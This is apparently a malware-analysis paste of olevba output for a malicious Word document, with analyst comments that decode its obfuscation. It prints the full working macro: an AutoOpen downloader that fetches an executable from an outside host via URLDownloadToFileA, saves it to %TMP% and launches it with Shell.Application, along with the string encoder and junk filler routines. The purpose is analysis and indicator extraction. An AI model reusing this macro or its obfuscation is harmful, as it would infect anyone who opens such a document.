
Malicious Word macro

dynamoo Mar 13th, 2015 308 Never
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- r-1179776-2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: r-1179776-2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' Auto-exec entry point in ThisDocument: olevba flags AutoOpen as running when the
      ' Word document is opened. Its only statement hands control to atqk_x482mp6v, which is
      ' defined in a separate .bas module of the same document.
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Public Sub JHyKASbxIHuhtS84()
      ' NOTE(review): this Sub and the nine after it in Class1 share one template: an Integer
      ' counter, a DoEvents loop whose upper bound (Jl, yB, sb, ...) is neither declared nor
      ' assigned in the code shown, and a 16-character literal stored in a local String that
      ' is never read. None of them is called from the macro code in this report, so they
      ' look like filler rather than payload logic.
      ' Presumably the unassigned bounds evaluate to 0 (no Option Explicit is visible), in
      ' which case the loops never iterate - confirm in a debugger if it matters.
      ' These literals are the likely source of olevba's "Base64 Strings" flag for this
      ' module; check with --decode before treating that flag as a finding.
  30. Dim geRVTgYKeFHEkG74 As Integer
  31. For geRVTgYKeFHEkG74 = 6 To Jl
  32. DoEvents
  33. Next geRVTgYKeFHEkG74
  34. Dim vLMDtrhALGmHPA31 As String
  35. vLMDtrhALGmHPA31 = "CtlLoYxCdDrrCR11"
  36. End Sub
  37.  
  38. Public Sub xlvLhuAzNZGLWN89()
  39. Dim WTCBlIIcmnviie69 As Integer
  40. For WTCBlIIcmnviie69 = 3 To yB
  41. DoEvents
  42. Next WTCBlIIcmnviie69
  43. Dim txdGLvkuqZelnG26 As String
  44. txdGLvkuqZelnG26 = "EIQWCNvZTnSUDK16"
  45. End Sub
  46.  
  47. Public Sub ofWOXlANArfREH64()
  48. Dim lrqvxpqOjtKHXZ44 As Integer
  49. For lrqvxpqOjtKHXZ44 = 9 To sb
  50. DoEvents
  51. Next lrqvxpqOjtKHXZ44
  52. Dim JhORnQktQeAtoT34 As String
  53. JhORnQktQeAtoT34 = "auVlNAaFAtyjZk14"
  54. End Sub
  55.  
  56. Public Sub iTpzwmkdrKMuCX21()
  57. Dim TJIibCvUvHEwoB11 As Integer
  58. For TJIibCvUvHEwoB11 = 9 To LW
  59. DoEvents
  60. Next TJIibCvUvHEwoB11
  61. Dim HIVVBSikgJiUZQ81 As String
  62. HIVVBSikgJiUZQ81 = "fMxregfSOGJXGF72"
  63. End Sub
  64.  
  65. Public Sub pIJXclhCxOCUIg61()
  66. Dim UMhzAWxkJUYXMk41 As Integer
  67. For UMhzAWxkJUYXMk41 = 9 To EN
  68. DoEvents
  69. Next UMhzAWxkJUYXMk41
  70. Dim KQTKzQyaUIqifr31 As String
  71. KQTKzQyaUIqifr31 = "hCrVyddxzYMxnu12"
  72. End Sub
  73.  
  74. Public Sub vpkmlyrWJDiBrW25()
  75. Dim XwHnxUqjsQJfjV15 As Integer
  76. For XwHnxUqjsQJfjV15 = 3 To nR
  77. DoEvents
  78. Next XwHnxUqjsQJfjV15
  79. Dim usyhXcMNzSwbPP86 As String
  80. usyhXcMNzSwbPP86 = "RvRwNBawxPtDCD76"
  81. End Sub
  82.  
  83. Public Sub uxtXPcgVNZdndx27()
  84. Dim kflSpdVIGEJSTo17 As Integer
  85. For kflSpdVIGEJSTo17 = 9 To Ev
  86. DoEvents
  87. Next kflSpdVIGEJSTo17
  88. Dim GbKKfGrepAnaKs88 As String
  89. GbKKfGrepAnaKs88 = "NhiUFRDSNEtdqV78"
  90. End Sub
  91.  
  92. Public Sub XNMdWIxljyiqdn33()
  93. Dim ldllVpEGQrJvvE23 As Integer
  94. For ldllVpEGQrJvvE23 = 7 To fn
  95. DoEvents
  96. Next ldllVpEGQrJvvE23
  97. Dim EeIivNdvntwPKh93 As String
  98. EeIivNdvntwPKh93 = "zgufZAlMWetBtl83"
  99. End Sub
  100.  
  101. Public Sub CeAuCYmrOCqQVL73()
  102. Dim wgNdaiAbrWMBpX53 As Integer
  103. For wgNdaiAbrWMBpX53 = 7 To VT
  104. DoEvents
  105. Next wgNdaiAbrWMBpX53
  106. Dim TyhzAVqoLXvsEI43 As String
  107. TyhzAVqoLXvsEI43 = "rkFiRnkRfMibHQ23"
  108. End Sub
  109.  
  110. Public Sub dRzRKlperameln47()
  111. Dim PHnPXMhvvBrjYE27 As Integer
  112. For PHnPXMhvvBrjYE27 = 1 To UF
  113. DoEvents
  114. Next PHnPXMhvvBrjYE27
  115. Dim MUHnwPBigNIZNg97 As String
  116. MUHnwPBigNIZNg97 = "lLgYbsyEIVkJdl88"
  117. End Sub
  118.  
  119.  
  120. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  121. ANALYSIS:
  122. +------------+----------------+-----------------------------------------+
  123. | Type       | Keyword        | Description                             |
  124. +------------+----------------+-----------------------------------------+
  125. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  126. |            |                | may be used to obfuscate strings        |
  127. |            |                | (option --decode to see all)            |
  128. +------------+----------------+-----------------------------------------+
  129. -------------------------------------------------------------------------------
  130. VBA MACRO аываываАавп.bas
  131. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u044b\u0432\u0430\u044b\u0432\u0430\u0410\u0430\u0432\u043f'
  132. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  133. #If VBA7 Then
      ' Binds a private alias to URLDownloadToFileA exported by urlmon. The #If/#Else pair
      ' gives a PtrSafe/LongPtr declaration for VBA7 hosts and a Long-based one otherwise;
      ' both branches declare the same five-parameter signature.
      ' Only the alias is renamed: the API name itself stays in cleartext in the Alias
      ' string, which is what olevba's keyword scan reports for this module.
      ' NOTE(review): the accented identifiers in this module look like Cyrillic names shown
      ' through the wrong code page (compare the \u04xx escapes in the OLE stream name) -
      ' confirm against the original sample before searching on them.
  134.     Private Declare PtrSafe Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  135.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  136.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  137.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  138.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  139.     ByVal ÐÎÀðàâûðàÃÎâïfds As LongPtr) As LongPtr
  140. #Else
  141.     Private Declare Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  142.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  143.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  144.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  145.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  146.     ByVal ÐÎÀðàâûðàÃÎâïfds As Long) As Long
  147. #End If
  148. Sub atqk_x482mp6v()
      ' Reached from autoopen in ThisDocument. Both arguments are decoded by QSzFZhQCxywB,
      ' which keeps the characters at odd positions (1, 3, 5, ...) and drops the rest.
      ' Second argument: Environ("TMP") & "\fJChjfgD675eDTU.exe" (the local drop path).
      ' First argument: the download URL. As rendered here it decodes cleanly only as far
      ' as "hxxp://awbrs[.]com"; after that the alternation is off by one, so the paste has
      ' presumably lost one non-printable filler character. Assuming a single dropped
      ' character the rest reads "[.]au/js/bin[.]exe" - confirm against the original sample
      ' before using it as an IOC.
  149. âàûâÀÀûâïûâà QSzFZhQCxywB("h<tQtFpi:I/t/Uajwubnr„sA.]cloom.Ja@uy/}jWsc/$b4i„n\.SeTxQe["), Environ(QSzFZhQCxywB("TsMQPQ")) & QSzFZhQCxywB("\8f9JmC}h1jhf)geD06R7i5SeNDBTeU_.'elx€e(")
  150. End Sub
  151. Function âàûâÀÀûâïûâà(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
      ' Download-and-launch helper. z0ktwRXRQZl2qo0_ is passed in the URL position and
      ' d4ok1z1Z0N in the file-name position of the URLDownloadToFileA alias declared in
      ' this module; the other three arguments are 0.
      ' The function never assigns its own name, so it returns the Boolean default, and
      ' the API result is stored in an undeclared variable that is never checked.
  152. ÏÐûâàÀ = ÎðâààÌÐÎëâïâàï(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
      ' The Chr$() chain is the same odd-position encoding: it decodes to "Shell.Application".
  153. Set ãíÃØÀÏøâûà = CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) & Chr$(108) & Chr$(89) & Chr$(108) & Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) & Chr$(52) & Chr$(112) & Chr$(97) & Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) & Chr$(105) & Chr$(47) & Chr$(99) & Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) & Chr$(59) & Chr$(105) & Chr$(75) & Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
      ' Decodes to Environ("TMP") & "\fJChjfgD675eDTU.exe", the same path the caller passes
      ' as the download target, so the file just written is handed to the shell object.
      ' This .Open is a method call on that object, not the VBA Open statement, so olevba's
      ' "May open a file" description understates what the line does.
      ' Hunting note: the observable chain is Word fetching a URL through urlmon, a new
      ' .exe appearing under %TMP%, and that file being started from the Office process.
  154. ãíÃØÀÏøâûà.Open Environ(QSzFZhQCxywB(Chr$(84) & Chr$(106) & Chr$(77) & Chr$(107) & Chr$(80) & Chr$(104))) & QSzFZhQCxywB(Chr$(92) & Chr$(114) & Chr$(102) & Chr$(85) & Chr$(74) & Chr$(71) & Chr$(67) & Chr$(85) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(95) & Chr$(102) & Chr$(67) & Chr$(103) & Chr$(98) & Chr$(68) & Chr$(105) & Chr$(54) & Chr$(110) & Chr$(55) & Chr$(94) & Chr$(53) & Chr$(42) & Chr$(101) & Chr$(98) & Chr$(68) & Chr$(57) & Chr$(84) & Chr$(127) & Chr$(85) & Chr$(118) & Chr$(46) & Chr$(96) & Chr$(101) & Chr$(36) & Chr$(120) & Chr$(117) & Chr$(101) & Chr$(100))
  155. End Function
  156.  
  157.  
  158.  
  159. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  160. ANALYSIS:
  161. +------------+--------------------+-----------------------------------------+
  162. | Type       | Keyword            | Description                             |
  163. +------------+--------------------+-----------------------------------------+
  164. | Suspicious | CreateObject       | May create an OLE object                |
  165. | Suspicious | Lib                | May run code from a DLL                 |
  166. | Suspicious | Open               | May open a file                         |
  167. | Suspicious | Environ            | May read system environment variables   |
  168. | Suspicious | Chr                | May attempt to obfuscate specific       |
  169. |            |                    | strings                                 |
  170. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  171. +------------+--------------------+-----------------------------------------+
  172. -------------------------------------------------------------------------------
  173. VBA MACRO апавпППавп.bas
  174. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u043f\u0430\u0432\u043f\u041f\u041f\u0430\u0432\u043f'
  175. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  176.  
  177. Public Function QSzFZhQCxywB(CwOLiEdjfquIe As String) As String
      ' String de-obfuscator called by the downloader module: builds the result from the
      ' characters at positions 1, 3, 5, ... of the input (Step 2 from 1), so every
      ' even-position character is filler. The loop counter is not declared.
      ' olevba reports no suspicious keyword or IOC for this module, and the file's flag
      ' string has no "I": the keyword scan does not undo this encoding, so the URL and
      ' drop path have to be decoded by hand.
  178. For pytQnFatnd = 1 To Len(CwOLiEdjfquIe) Step 2
  179. QSzFZhQCxywB = QSzFZhQCxywB & Mid(CwOLiEdjfquIe, pytQnFatnd, 1)
  180. Next
  181. End Function
  182.  
  183. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  184. ANALYSIS:
  185. No suspicious keyword or IOC found.